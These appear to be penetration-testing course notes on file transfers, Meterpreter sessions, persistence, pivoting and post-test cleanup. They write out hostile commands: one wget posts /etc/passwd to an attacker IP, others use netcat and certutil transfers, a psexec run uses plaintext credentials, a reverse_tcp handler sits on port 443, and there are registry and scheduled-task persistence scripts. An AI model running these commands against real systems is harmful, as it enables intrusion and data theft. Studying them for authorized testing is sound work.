Maintaining Access / Pivoting / Cleanup - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network. The Legal Side of the House - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage in their early careers. Report Writing - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that will cover many of the findings that we have discussed in prior chapters. This will provide students with a clear understanding of what is expected on a penetration test report and how to write on effectively.

File Transfers

Linux

# HOST FILES
python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP

# GRAB FILES
wget http://<ip>:80/secrets.txt
# RECEIVE FILES
nc -nvlp <port> file # redirect into new file
# SEND FILES
## nc
nc <ip> <port> < file
## wget, receiver has to clean the file
wget --post-file=/etc/passwd 192.168.202.128:8081
tail -n +10 file > clean_file # delete transfer data

Windows

# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>

Meterpreter

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A

Pivoting

Gained access to a machine on the 192 network that is dualhomed with the 10 network (just need two NICs, or network adapters in VBox).

# Check for other networks, besides ipconfig
route print
arp -a
netstat

Scanning on a pivot is incredibly slow, but:

use auxiliary/scanner/portscan/tcp

Cleanup

The cleanup process covers the requirements for cleaning up systems once the penetration test has been completed, not removing logs, etc. This will include all user accounts and binaries used during the test.

• Remove all executable, scripts and temporary file from a compromised system. If possible use secure delete method for removing the files and folders.

• Return to original values system settings and application configuration parameters if they where modified during the assessment.

• Remove all backdoors and/or rootkits installed.

• Remove any user accounts created for connecting back to compromise systems.

The Legal Side

Report Writing

Career Advice